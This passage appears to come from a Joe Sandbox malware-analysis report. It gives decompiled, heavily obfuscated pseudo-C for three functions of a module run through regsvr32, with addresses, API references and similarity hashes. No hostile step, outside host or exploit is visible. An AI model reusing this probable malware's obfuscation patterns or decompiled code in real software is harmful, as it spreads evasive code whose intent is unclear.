                          				 *(_t264 + 0x120) =  *(_t264 + 0x110) + 0xffffdefd;
                          				 *(_t264 + 0x110) = r11d;
                          				 *(_t264 + 0x108) = _t7;
                          				if (_t195 - _t278 + 0xd1 > 0) goto 0x8c07b204;
                          				_t281 =  *((intOrPtr*)(_t264 + 0x128));
                          				r15d = __r11 - 0x15b;
                          				 *(_t264 + 0x38) = r15d;
                          				 *(_t264 + 0x30) = __r9 - 0x150e;
                          				r14d = __rdx + 0x3666;
                          				 *(_t264 + 0x28) = __r9 + 0x22c;
                          				 *(_t264 + 0x20) = r15d;
                          				_t158 = E00007FF87FF88C078BF0(r14d, __r9 + 0x15b, __rax, __rbx, __rcx, __rdx, __r8, _t281, __r11, _t287, _t285, _t280, _t278);
                          				_t40 = _t259 + 0x1033; // 0x37e1
                          				r10d = _t40;
                          				r11d = _t278 + 0x25a;
                          				 *(_t264 + 0x50) = r10d;
                          				 *(_t264 + 0x48) = _t281;
                          				 *(_t264 + 0x40) = r11d;
                          				 *(_t264 + 0x38) = _t177 + 0x7bc;
                          				r9d = __rdx + 0x10a3;
                          				 *(_t264 + 0x30) = __rcx + 0x37e1;
                          				r8d = __rcx + 0x3a59;
                          				 *(_t264 + 0x28) = __rdx + 0x77c;
                          				 *(_t264 + 0x20) = _t224 + 0xffffe5d9;
                          				 *(_t264 + 0x120) = _t158;
                          				_t159 = E00007FF87FF88C08CDF0( *(_t264 + 0x110) + 0x4c4, __rax, _t237, __rcx, __rdx, __r8, __r11, _t285);
                          				r12d = r12d + 0x18b7;
                          				r9d =  *(_t264 + 0x78);
                          				r10d =  *(_t264 + 0x70);
                          				r9d = r9d + 0xffffebf8;
                          				r10d = r10d + 0xffffed59;
                          				r8d =  *(_t264 + 0x108);
                          				r8d = r8d + 0x927;
                          				 *(_t264 + 0x50) = r14d;
                          				 *(_t264 + 0x48) = _t159;
                          				r13d = _t159;
                          				 *(_t264 + 0x40) =  *(_t264 + 0x120) + 0xfffff40f;
                          				 *(_t264 + 0x38) = r9d;
                          				r11d = _t256 + 0x2598;
                          				 *(_t264 + 0x30) = r10d;
                          				r9d = r12d;
                          				 *(_t264 + 0x28) = r11d;
                          				 *(_t264 + 0x20) =  *(_t264 + 0xd0) + 0x10ce;
                          				_t238 =  *((intOrPtr*)(_t264 + 0x128));
                          				_t160 = E00007FF87FF88C072A70(_t238, __rcx, _t238, __r8, _t274); // executed
                          				_t242 =  *((intOrPtr*)(_t238 + 0x23c));
                          				r11d = _t256 + 0x27ae;
                          				_t75 = _t281 + 0xea7; // 0xea7
                          				r10d = _t75;
                          				r14d =  *(_t264 + 0xd0);
                          				r15d = _t160;
                          				r9d =  *(_t264 + 0x120);
                          				_t78 = _t234 + 0x1669; // 0x1669
                          				 *((long long*)(_t238 + 0x158)) = _t242;
                          				_t80 = _t234 + 0x19bd; // 0x19bd
                          				r8d = _t80;
                          				_t227 =  *((intOrPtr*)(_t264 + 0x80)) + 0xffffed95;
                          				 *((intOrPtr*)(_t264 + 0x68)) = _t78;
                          				r14d = r14d + 0x14c1;
                          				r9d = r9d + 0x2b1;
                          				 *(_t264 + 0x60) = r12d;
                          				 *(_t264 + 0x58) = r8d;
                          				r8d = r13d;
                          				_t282 =  *((intOrPtr*)(_t264 + 0x128));
                          				 *(_t264 + 0x50) = r10d;
                          				 *(_t264 + 0x48) = r11d;
                          				 *(_t264 + 0x40) =  *(_t264 + 0x118) + 0x77c;
                          				 *(_t264 + 0x38) = _t234 + 0x1a27;
                          				 *(_t264 + 0x30) = _t234 + 0x126b;
                          				 *(_t264 + 0x28) = _t227;
                          				 *(_t264 + 0x20) = r14d;
                          				E00007FF87FF88C0732C0(_t238, _t242, _t282, _t261, _t266, _t287);
                          				_t98 = _t287 + 0x360; // 0x360
                          				r11d =  *(_t264 + 0xd8);
                          				r9d =  *(_t264 + 0x120);
                          				r11d = r11d + 0x16b5;
                          				r10d = _t242 - 0x886;
                          				 *(_t264 + 0x48) =  *(_t264 + 0x118) + 0xd1;
                          				r8d = _t242 - 0x6af;
                          				 *(_t264 + 0x40) = r10d;
                          				_t203 = _t242 + 0x12a7;
                          				 *(_t264 + 0x38) = r11d;
                          				_t212 =  *(_t264 + 0x108) + 0x113b;
                          				 *(_t264 + 0x30) = _t282;
                          				r9d = r9d + 0x8d0;
                          				 *(_t264 + 0x28) = _t98;
                          				 *(_t264 + 0x20) = _t212;
                          				E00007FF87FF88C08D230(_t203, _t234, _t238, _t242, _t282);
                          				goto 0x8c07b37e;
                          				_t239 =  *((intOrPtr*)(_t264 + 0x128));
                          				if (_t239[0x24] - _t234 >= 0) goto 0x8c07b306;
                          				_t283 = r14d;
                          				if (_t239[0x62] - (_t239[0x50] - 0x23f6) * _t283 <= 0) goto 0x8c07b306;
                          				r15d = _t203;
                          				r12d = r11d;
                          				r12d = r12d *  *(_t264 + 0x120);
                          				r15d = r15d ^ r14d;
                          				r14d =  *(_t264 + 0x118);
                          				r8d = r12d;
                          				r9d = _t239[0x48];
                          				r9d = r9d & 0x00003595;
                          				r9d = r9d + _t239[0x50];
                          				 *(_t264 + 0x38) = (_t239[0x70] & r14d) * r9d;
                          				 *(_t264 + 0x30) = (_t239[0x36] | _t227) + _t239[0x62];
                          				 *(_t264 + 0x28) = _t239;
                          				 *(_t264 + 0x20) = r15d;
                          				E00007FF87FF88C0909D0(_t239[0x62] ^  *_t239, (r14d |  *(_t264 + 0x74)) & 0x00003666, _t239, (_t239[0x50] - 0x23f6) * _t283, _t282, _t239[0x62], _t259, _t261, _t266, _t281, __r11, _t278, _t285, _t287);
                          				r9d =  *(_t264 + 0x78);
                          				if (_t212 + 4 - (_t239[0x50] - 0x23f6) * _t283 > 0) goto 0x8c07b270;
                          				r14d =  *(_t264 + 0xd0);
                          				r12d =  *(_t264 + 0xd8);
                          				r10d =  *(_t264 + 0x7c);
                          				r11d =  *(_t264 + 0x110);
                          				r12d = r12d & r10d;
                          				if (r14d - r12d > 0) goto 0x8c07b378;
                          				 *(_t264 + 0x28) = _t239[0x2c] * _t239[0x12];
                          				 *_t239 =  *_t239 | _t239[0x62] - r14d;
                          				 *(_t264 + 0x20) = __r11 - 0x23f6;
                          				InitializeCriticalSection(_t256);
                          				return _t261 - 0x12ab;
                          			}



































                          0x7ff88c07ae80
                          0x7ff88c07ae80
                          0x7ff88c07ae80
                          0x7ff88c07ae80
                          0x7ff88c07ae80
                          0x7ff88c07ae80
                          0x7ff88c07ae85
                          0x7ff88c07ae86
                          0x7ff88c07ae90
                          0x7ff88c07ae97
                          0x7ff88c07ae9f
                          0x7ff88c07aead
                          0x7ff88c07aeb4
                          0x7ff88c07aebc
                          0x7ff88c07aec2
                          0x7ff88c07aec9
                          0x7ff88c07aed1
                          0x7ff88c07aed8
                          0x7ff88c07aedf
                          0x7ff88c07aee5
                          0x7ff88c07aeea
                          0x7ff88c07aef1
                          0x7ff88c07aefc
                          0x7ff88c07af04
                          0x7ff88c07af08
                          0x7ff88c07af16
                          0x7ff88c07af22
                          0x7ff88c07af29
                          0x7ff88c07af3c
                          0x7ff88c07af41
                          0x7ff88c07af50
                          0x7ff88c07af58
                          0x7ff88c07af61
                          0x7ff88c07af67
                          0x7ff88c07af76
                          0x7ff88c07af84
                          0x7ff88c07af89
                          0x7ff88c07af8d
                          0x7ff88c07af94
                          0x7ff88c07afa2
                          0x7ff88c07afaa
                          0x7ff88c07afb6
                          0x7ff88c07afb6
                          0x7ff88c07afc1
                          0x7ff88c07afc9
                          0x7ff88c07afd4
                          0x7ff88c07afdf
                          0x7ff88c07aff0
                          0x7ff88c07aff4
                          0x7ff88c07affb
                          0x7ff88c07b006
                          0x7ff88c07b013
                          0x7ff88c07b01d
                          0x7ff88c07b021
                          0x7ff88c07b028
                          0x7ff88c07b034
                          0x7ff88c07b03b
                          0x7ff88c07b046
                          0x7ff88c07b04b
                          0x7ff88c07b059
                          0x7ff88c07b060
                          0x7ff88c07b075
                          0x7ff88c07b07c
                          0x7ff88c07b084
                          0x7ff88c07b088
                          0x7ff88c07b08b
                          0x7ff88c07b08f
                          0x7ff88c07b094
                          0x7ff88c07b09b
                          0x7ff88c07b0a0
                          0x7ff88c07b0a3
                          0x7ff88c07b0a8
                          0x7ff88c07b0ac
                          0x7ff88c07b0b7
                          0x7ff88c07b0bc
                          0x7ff88c07b0c3
                          0x7ff88c07b0d1
                          0x7ff88c07b0d1
                          0x7ff88c07b0d8
                          0x7ff88c07b0e0
                          0x7ff88c07b0e3
                          0x7ff88c07b0eb
                          0x7ff88c07b0f1
                          0x7ff88c07b0f8
                          0x7ff88c07b0f8
                          0x7ff88c07b114
                          0x7ff88c07b120
                          0x7ff88c07b124
                          0x7ff88c07b131
                          0x7ff88c07b13e
                          0x7ff88c07b143
                          0x7ff88c07b148
                          0x7ff88c07b14b
                          0x7ff88c07b153
                          0x7ff88c07b15b
                          0x7ff88c07b160
                          0x7ff88c07b164
                          0x7ff88c07b168
                          0x7ff88c07b16c
                          0x7ff88c07b170
                          0x7ff88c07b175
                          0x7ff88c07b17e
                          0x7ff88c07b18c
                          0x7ff88c07b199
                          0x7ff88c07b1a1
                          0x7ff88c07b1af
                          0x7ff88c07b1b6
                          0x7ff88c07b1ba
                          0x7ff88c07b1c1
                          0x7ff88c07b1c6
                          0x7ff88c07b1cc
                          0x7ff88c07b1d1
                          0x7ff88c07b1d7
                          0x7ff88c07b1dc
                          0x7ff88c07b1e3
                          0x7ff88c07b1ed
                          0x7ff88c07b1f1
                          0x7ff88c07b1ff
                          0x7ff88c07b204
                          0x7ff88c07b21e
                          0x7ff88c07b239
                          0x7ff88c07b243
                          0x7ff88c07b249
                          0x7ff88c07b24c
                          0x7ff88c07b24f
                          0x7ff88c07b258
                          0x7ff88c07b25b
                          0x7ff88c07b276
                          0x7ff88c07b28e
                          0x7ff88c07b299
                          0x7ff88c07b2a0
                          0x7ff88c07b2a7
                          0x7ff88c07b2ad
                          0x7ff88c07b2b1
                          0x7ff88c07b2b6
                          0x7ff88c07b2bb
                          0x7ff88c07b2ca
                          0x7ff88c07b2e0
                          0x7ff88c07b2e2
                          0x7ff88c07b2ea
                          0x7ff88c07b2f9
                          0x7ff88c07b2fe
                          0x7ff88c07b306
                          0x7ff88c07b30c
                          0x7ff88c07b352
                          0x7ff88c07b356
                          0x7ff88c07b36d
                          0x7ff88c07b372
                          0x7ff88c07b398

                          APIs
                          • InitializeCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,?), ref: 00007FF88C07B372
                          Memory Dump Source
                          • Source File: 00000003.00000002.389521559.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000003.00000002.389503061.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389771313.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389956635.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389983202.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.390104358.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.390153087.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff88c070000_regsvr32.jbxd
                          Similarity
                          • API ID: CriticalInitializeSection
                          • String ID:
                          • API String ID: 32694325-0
                          • Opcode ID: 9df92d1baa61c7f56646a986d98c465c445fbecd55eb9f720856bf70d3a07489
                          • Instruction ID: d5f4c7588a5110d9968ed35257de727d051ace862d1c3e5989a66e3e7d380e8d
                          • Opcode Fuzzy Hash: 9df92d1baa61c7f56646a986d98c465c445fbecd55eb9f720856bf70d3a07489
                          • Instruction Fuzzy Hash: 2ED15C736082C58BC765CF15E480BDEBBA4F788788F144126EB8967B58DB38EA55CF40
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 41%
                          			E00007FF87FF88C07A4F0(void* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, void* __r8, void* __r9) {
                          				void* __r12;
                          				void* __r13;
                          				void* __r14;
                          				signed int _t153;
                          				intOrPtr _t185;
                          				signed int _t194;
                          				void* _t204;
                          				signed int _t215;
                          				intOrPtr _t216;
                          				long long _t221;
                          				intOrPtr _t222;
                          				void* _t232;
                          				long long _t236;
                          				void* _t239;
                          				void* _t240;
                          				void* _t243;
                          				struct _CRITICAL_SECTION* _t245;
                          				void* _t247;
                          				void* _t249;
                          				long long _t250;
                          				signed int _t251;
                          				void* _t253;
                          
                          				_t243 = __r9;
                          				_t231 = __rdx;
                          				_t204 = __rax;
                          				 *((long long*)(_t239 + 0x10)) = __rbx;
                          				 *((long long*)(_t239 + 0x18)) = _t236;
                          				 *((long long*)(_t239 + 0x20)) = __rsi;
                          				_push(_t232);
                          				_t240 = _t239 - 0x90;
                          				r13d =  *(_t240 + 0x110);
                          				r11d = __rcx + 0x7bc;
                          				r14d =  *(_t240 + 0x120);
                          				r8d =  *(_t240 + 0xe0);
                          				r9d = _t247 + 0x1137;
                          				r15d = _t247 - 0x21a;
                          				r12d =  *(_t240 + 0xf8);
                          				 *(_t240 + 0x80) = r15d;
                          				 *(_t240 + 0x120) =  *(_t240 + 0xe8) + 0x40c;
                          				r10d = _t247 + 0xf35;
                          				 *(_t240 + 0x110) = r10d;
                          				 *(_t240 + 0xc0) = r11d;
                          				r12d = r12d + 0xffffefef;
                          				if (__r8 - 0x40c - __r9 - 0x17e6 < 0) goto 0x8c07a883;
                          				if (r12d - __rcx - 0x1157 <= 0) goto 0x8c07a789;
                          				 *((intOrPtr*)(_t240 + 0x60)) = __rdx + 0x2103;
                          				r10d = _t232 + 0x38e9;
                          				_t250 =  *((intOrPtr*)(_t240 + 0x108));
                          				 *((long long*)(_t240 + 0x58)) = _t250;
                          				r11d = _t253 + 0x114f;
                          				 *(_t240 + 0x50) = r10d;
                          				r9d = __r8 - 0xde7;
                          				 *(_t240 + 0x48) = r11d;
                          				r8d = __rdx + 0x343a;
                          				 *(_t240 + 0x40) = _t236 + 0x37e1;
                          				 *(_t240 + 0x38) = _t249 - 0x30d5 + 0x27b2;
                          				 *(_t240 + 0x30) = _t236 + 0x2103;
                          				 *(_t240 + 0x28) = __rcx + 0x2b1;
                          				 *(_t240 + 0x20) = r13d;
                          				E00007FF87FF88C0711F0(__rcx, __rdx, __rsi, _t236, __r8, _t245, _t247, _t250); // executed
                          				r9d =  *(_t240 + 0x110);
                          				r9d = r9d + 0xffffeeb1;
                          				 *((long long*)(_t250 + 0x158)) =  *((intOrPtr*)(_t250 + 0x350));
                          				_t49 = _t204 - 0x814; // -2068
                          				_t153 = _t49;
                          				_t51 = _t204 - 0x108; // -264
                          				r10d = _t51;
                          				_t53 = _t231 - 0x113b; // -4411
                          				_t185 = _t53;
                          				 *(_t240 + 0x78) = r10d;
                          				_t55 = _t231 - 0x4af; // -1199
                          				r8d = _t55;
                          				_t221 =  *((intOrPtr*)(_t250 + 0xe0)) + 0x3595;
                          				_t194 =  *(_t240 + 0xe0) + 0x24c;
                          				 *((long long*)(_t250 + 0x58)) = _t221;
                          				r14d =  *(_t240 + 0xc0);
                          				r13d =  *(_t240 + 0xe8);
                          				r11d = _t221 - 0x202;
                          				 *(_t240 + 0x70) = r11d;
                          				 *(_t240 + 0x68) = _t153;
                          				r15d = _t221 - 0x113b;
                          				_t215 =  *((intOrPtr*)(_t240 + 0x108));
                          				r12d = _t221 - 0x760;
                          				 *((intOrPtr*)(_t240 + 0x60)) = _t204 - 0x1563;
                          				 *((intOrPtr*)(_t240 + 0x58)) = _t185;
                          				r14d = r14d + 0xffffe5d9;
                          				 *(_t240 + 0x50) = _t194;
                          				r13d = r13d + 0x2b1;
                          				 *(_t240 + 0x48) = r14d;
                          				 *(_t240 + 0x40) = r15d;
                          				 *(_t240 + 0x38) = _t215;
                          				 *(_t240 + 0x30) = r12d;
                          				 *(_t240 + 0x28) =  *(_t240 + 0x120) + 0xfffff21d;
                          				 *(_t240 + 0x20) = r13d;
                          				E00007FF87FF88C08E7E0(_t221, __rdx, __r8, _t243, _t253, _t249, _t247); // executed
                          				_t222 =  *((intOrPtr*)(_t215 + 0xd0));
                          				r15d =  *(_t240 + 0x80);
                          				 *((short*)(_t215 + 0xf8)) =  *(_t222 + 6) & 0x0000ffff;
                          				 *((long long*)(_t215 + 0x108)) = _t222 + 0x108;
                          				 *((intOrPtr*)(_t215 + 0x100)) =  *((intOrPtr*)(_t215 + 0x100)) + _t222 -  *((intOrPtr*)( *((intOrPtr*)(_t215 + 0x1a0)) + 0x100));
                          				goto 0x8c07a93e;
                          				_t216 =  *((intOrPtr*)(_t240 + 0x108));
                          				if (r15d - ( *(_t216 + 0x188) |  *(_t216 + 0xb8)) < 0) goto 0x8c07a93e;
                          				r14d = 0x228c;
                          				r10d = r10d ^ 0x000038e9;
                          				 *(_t240 + 0x110) = r10d;
                          				asm("o16 nop [eax+eax]");
                          				r8d = r10d;
                          				r8d = r8d *  *(_t216 + 0x120);
                          				 *(_t240 + 0x20) = _t194 * r9d;
                          				r9d = ( *(_t216 + 0x228) & 0x0000ffff) * (r8w & 0xffffffff) & 0x0000ffff;
                          				r9d = r9d * (r11w & 0xffffffff);
                          				EnterCriticalSection(_t245);
                          				r8d =  *(_t240 + 0xe0);
                          				r10d =  *(_t240 + 0x110);
                          				r11d =  *(_t240 + 0xc0);
                          				 *(_t216 + 0xe0) =  *(_t216 + 0xe0) | _t185 - (r12d -  *((intOrPtr*)(_t216 + 0x110)) & r15d) ^  *(_t216 + 0x1f8) ^  *(_t216 + 0x1c0);
                          				if (r15d + 1 - ( *(_t216 + 0x188) |  *(_t216 + 0xb8)) >= 0) goto 0x8c07a7d0;
                          				goto 0x8c07a93e;
                          				_t251 =  *((intOrPtr*)(_t240 + 0x108));
                          				if (r15d -  *(_t251 + 0xe0) *  *(_t251 + 0x60) * _t153 <= 0) goto 0x8c07a93e;
                          				r11d =  *(_t251 + 0x120);
                          				r11d = r11d | r8d;
                          				r10d =  *(_t251 + 0x78);
                          				r9d =  *_t251;
                          				r10d = r10d +  *((intOrPtr*)(_t251 + 0x18));
                          				r9d = r9d - ( *(_t216 + 0x1d0) & 0x0000ffff ^  *(_t216 + 0x130) ^  *(_t216 + 0xa8));
                          				r8d =  *(_t240 + 0xc0);
                          				r10d = r10d | 0x00003666;
                          				 *(_t240 + 0x48) =  *(_t251 + 0x48) * 0x36e7;
                          				 *(_t240 + 0x40) = ( *(_t251 + 0x100) | 0x00003666) ^  *(_t251 + 0x1b0);
                          				 *(_t240 + 0x38) = r11d;
                          				r12d = r12d * (__r8 - 0x40c);
                          				 *(_t240 + 0x30) = _t251;
                          				 *(_t240 + 0x28) =  *(_t251 + 0xf0) & r8d;
                          				 *(_t240 + 0x20) = r10d;
                          				r8d = r8d + r12d;
                          				E00007FF87FF88C08D230(( *(_t216 + 0x1d0) & 0x0000ffff ^  *(_t216 + 0x130) ^  *(_t216 + 0xa8)) -  *_t251 ^  *(_t251 + 0x188), r15d, _t216,  *(_t251 + 0xe0) *  *(_t251 + 0x60) * _t153, __rdx);
                          				return _t253 + 0x216;
                          			}

























                          0x7ff88c07a4f0
                          0x7ff88c07a4f0
                          0x7ff88c07a4f0
                          0x7ff88c07a4f0
                          0x7ff88c07a4f5
                          0x7ff88c07a4fa
                          0x7ff88c07a4ff
                          0x7ff88c07a508
                          0x7ff88c07a50f
                          0x7ff88c07a517
                          0x7ff88c07a51e
                          0x7ff88c07a526
                          0x7ff88c07a53c
                          0x7ff88c07a54a
                          0x7ff88c07a551
                          0x7ff88c07a565
                          0x7ff88c07a56d
                          0x7ff88c07a574
                          0x7ff88c07a582
                          0x7ff88c07a590
                          0x7ff88c07a5a5
                          0x7ff88c07a5bc
                          0x7ff88c07a5cb
                          0x7ff88c07a5d7
                          0x7ff88c07a5db
                          0x7ff88c07a601
                          0x7ff88c07a609
                          0x7ff88c07a60e
                          0x7ff88c07a615
                          0x7ff88c07a61a
                          0x7ff88c07a621
                          0x7ff88c07a626
                          0x7ff88c07a634
                          0x7ff88c07a638
                          0x7ff88c07a63c
                          0x7ff88c07a640
                          0x7ff88c07a644
                          0x7ff88c07a649
                          0x7ff88c07a657
                          0x7ff88c07a666
                          0x7ff88c07a66d
                          0x7ff88c07a674
                          0x7ff88c07a674
                          0x7ff88c07a681
                          0x7ff88c07a681
                          0x7ff88c07a68f
                          0x7ff88c07a68f
                          0x7ff88c07a695
                          0x7ff88c07a69a
                          0x7ff88c07a69a
                          0x7ff88c07a6a1
                          0x7ff88c07a6a8
                          0x7ff88c07a6ae
                          0x7ff88c07a6b8
                          0x7ff88c07a6c7
                          0x7ff88c07a6cf
                          0x7ff88c07a6d6
                          0x7ff88c07a6e1
                          0x7ff88c07a6e5
                          0x7ff88c07a6ec
                          0x7ff88c07a6f4
                          0x7ff88c07a6fb
                          0x7ff88c07a704
                          0x7ff88c07a708
                          0x7ff88c07a70f
                          0x7ff88c07a713
                          0x7ff88c07a71a
                          0x7ff88c07a725
                          0x7ff88c07a72a
                          0x7ff88c07a72f
                          0x7ff88c07a734
                          0x7ff88c07a738
                          0x7ff88c07a73d
                          0x7ff88c07a742
                          0x7ff88c07a749
                          0x7ff88c07a755
                          0x7ff88c07a763
                          0x7ff88c07a77d
                          0x7ff88c07a784
                          0x7ff88c07a789
                          0x7ff88c07a7a8
                          0x7ff88c07a7b2
                          0x7ff88c07a7b8
                          0x7ff88c07a7bf
                          0x7ff88c07a7ca
                          0x7ff88c07a7f0
                          0x7ff88c07a7f3
                          0x7ff88c07a802
                          0x7ff88c07a807
                          0x7ff88c07a816
                          0x7ff88c07a81e
                          0x7ff88c07a824
                          0x7ff88c07a837
                          0x7ff88c07a842
                          0x7ff88c07a85d
                          0x7ff88c07a878
                          0x7ff88c07a87e
                          0x7ff88c07a883
                          0x7ff88c07a8a4
                          0x7ff88c07a8c6
                          0x7ff88c07a8da
                          0x7ff88c07a8e4
                          0x7ff88c07a8eb
                          0x7ff88c07a8ee
                          0x7ff88c07a8f2
                          0x7ff88c07a8f5
                          0x7ff88c07a8fd
                          0x7ff88c07a915
                          0x7ff88c07a919
                          0x7ff88c07a91d
                          0x7ff88c07a922
                          0x7ff88c07a928
                          0x7ff88c07a92d
                          0x7ff88c07a931
                          0x7ff88c07a936
                          0x7ff88c07a939
                          0x7ff88c07a965

                          APIs
                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF88C07A81E
                            • Part of subcall function 00007FF88C0711F0: GetProcessHeap.KERNEL32 ref: 00007FF88C071490
                            • Part of subcall function 00007FF88C0711F0: RtlReleasePrivilege.NTDLL ref: 00007FF88C0714A3
                          Memory Dump Source
                          • Source File: 00000003.00000002.389521559.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000003.00000002.389503061.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389771313.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389956635.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389983202.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.390104358.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.390153087.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff88c070000_regsvr32.jbxd
                          Similarity
                          • API ID: CriticalEnterHeapPrivilegeProcessReleaseSection
                          • String ID:
                          • API String ID: 3441125642-0
                          • Opcode ID: 1b63504a4b40dae1c56da389596a0931d0353b063fbcd4a8ca78c4ed5e3cd33d
                          • Instruction ID: 5640b216f3397f42093833fb30de9063076d5153c2b2f72bff5f79e8a979c5b8
                          • Opcode Fuzzy Hash: 1b63504a4b40dae1c56da389596a0931d0353b063fbcd4a8ca78c4ed5e3cd33d
                          • Instruction Fuzzy Hash: DBB169731086C5CAC725CF15E444BEEB7A4F788B88F414125EB8A17B58DB78EA55CF00
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 71%
                          			E00007FF87FF88C089610(signed int __rax, long long __rbx, void* __rcx, void* __rdx, void* __r8, void* __r9, void* __r10, long long __r12, long long __r13, long long __r14, long long __r15, long long _a8, signed int _a16, signed int _a32, signed int _a40, signed int _a64, signed int* _a72, signed int _a80, signed int _a96) {
                          				long long _v32;
                          				long long _v40;
                          				long long _v48;
                          				long long _v56;
                          				signed int _v64;
                          				signed int _v72;
                          				signed int _v80;
                          				signed int _v88;
                          				signed int* _v96;
                          				intOrPtr _v104;
                          				intOrPtr _v112;
                          				intOrPtr _v120;
                          				signed int _v128;
                          				signed int _v136;
                          				void* __rsi;
                          				void* __rbp;
                          				signed int _t84;
                          				signed int _t88;
                          				signed int _t98;
                          				signed int _t103;
                          				signed int _t107;
                          				signed int _t117;
                          				signed int* _t124;
                          				signed long long _t129;
                          				void* _t135;
                          				void* _t136;
                          				void* _t137;
                          
                          				_t117 = __rax;
                          				_t88 = __r9 - 0xefd;
                          				r8d = _a80;
                          				_t98 = __rdx - 0x3189;
                          				r8d = r8d + 0xaeb;
                          				_t103 = _a64 + 0xffffeb3f;
                          				_a16 = _t98;
                          				r10d = __rax - 0xbf1;
                          				_a64 = _t103;
                          				_t107 = __rax + 0x8d0;
                          				_a80 = r10d;
                          				_a96 = _t107;
                          				_a32 = __r9 - 0x1086;
                          				_a40 = _t88;
                          				if (_t88 == __r10 + 0x216) goto 0x8c0898d3;
                          				_a8 = __rbx;
                          				_t124 = _a72;
                          				if (_t103 - __r10 + 0x114f >= 0) goto 0x8c089723;
                          				_v128 = 0x3189;
                          				r9d = 0x3a59;
                          				_v136 = 0x36e7;
                          				r8d = 0x2032;
                          				E00007FF87FF88C079AC0(_t124, __rcx, _t124, _t137); // executed
                          				_t124[0xdc] = _t117;
                          				_t124[0xcf] = 0;
                          				_t124[0x24] =  &(_t124[0x78]);
                          				 *((intOrPtr*)(_t124[0xc] + 0x100)) =  *((intOrPtr*)(_t124[0xc] + 0x100)) + _t124[0x44];
                          				_t124[0x44] = _t124[0x44] - 1;
                          				goto 0x8c0898b8;
                          				_v40 = __r13;
                          				_t129 =  *_t124 | _t98;
                          				if (_t124[0x54] != _t129) goto 0x8c0898cb;
                          				_v32 = __r12;
                          				_v48 = __r14;
                          				_v56 = __r15;
                          				asm("o16 nop [eax+eax]");
                          				if (r8d - _t129 < 0) goto 0x8c08987f;
                          				LeaveCriticalSection(??);
                          				r12d = _t124[0x32];
                          				r8d = r12d;
                          				_t84 = _a32;
                          				r8d = r8d & _t107;
                          				r9d = _t124[0x74];
                          				r11d = _t124[0x68];
                          				r9d = r9d | _t103;
                          				r11d = r11d | _t124[0x50];
                          				r12d = r12d ^ 0x00001f2c;
                          				r10d = _a64;
                          				r12d = r12d - _t84;
                          				r10d = r10d | 0x00002032;
                          				r11d = r11d - _t124[0x1e];
                          				r14d = _t124[0x78];
                          				r10d = r10d & _a80;
                          				r14d = r14d | _t84;
                          				r15d =  *_t124;
                          				r15d = r15d - _t124[0x16];
                          				r15d = r15d - 0x2103;
                          				_v64 = r11d;
                          				_v72 = r12d;
                          				_v80 = _t124[0x8a] ^ 0x00003666;
                          				_v88 = r10d;
                          				_v96 = _t124;
                          				_v104 = _t124[0x10] - r12d;
                          				_v112 = _t84 + 0x38e9;
                          				_v120 = _t124[0x54] * _a40 - _a96;
                          				_v128 = r14d;
                          				_v136 = r15d;
                          				r8d = E00007FF87FF88C07A4F0(r8d, _t124, _t129, _t124, _t136, __r8, __r9);
                          				_a80 = _a80 + _t124[0x1e] + _a96;
                          				r13d = r13d + 3;
                          				if (r13d == ( *_t124 | _a16)) goto 0x8c089760;
                          				return _t135 + 0x2103;
                          			}






























                          0x7ff88c089610
                          0x7ff88c089622
                          0x7ff88c089629
                          0x7ff88c089631
                          0x7ff88c08963e
                          0x7ff88c089645
                          0x7ff88c08964b
                          0x7ff88c089652
                          0x7ff88c089659
                          0x7ff88c089660
                          0x7ff88c089666
                          0x7ff88c089675
                          0x7ff88c08967c
                          0x7ff88c08968a
                          0x7ff88c089693
                          0x7ff88c0896a0
                          0x7ff88c0896a8
                          0x7ff88c0896b2
                          0x7ff88c0896b9
                          0x7ff88c0896c2
                          0x7ff88c0896c8
                          0x7ff88c0896cd
                          0x7ff88c0896db
                          0x7ff88c0896e0
                          0x7ff88c0896ee
                          0x7ff88c0896fc
                          0x7ff88c08970a
                          0x7ff88c089717
                          0x7ff88c08971e
                          0x7ff88c089729
                          0x7ff88c089731
                          0x7ff88c08973e
                          0x7ff88c089744
                          0x7ff88c08974c
                          0x7ff88c089751
                          0x7ff88c089756
                          0x7ff88c089772
                          0x7ff88c089778
                          0x7ff88c08977e
                          0x7ff88c089785
                          0x7ff88c089788
                          0x7ff88c08978f
                          0x7ff88c089792
                          0x7ff88c089799
                          0x7ff88c0897a0
                          0x7ff88c0897af
                          0x7ff88c0897be
                          0x7ff88c0897c5
                          0x7ff88c0897cd
                          0x7ff88c0897d6
                          0x7ff88c0897dd
                          0x7ff88c0897e7
                          0x7ff88c0897ee
                          0x7ff88c0897f6
                          0x7ff88c0897f9
                          0x7ff88c089801
                          0x7ff88c08980c
                          0x7ff88c089821
                          0x7ff88c089826
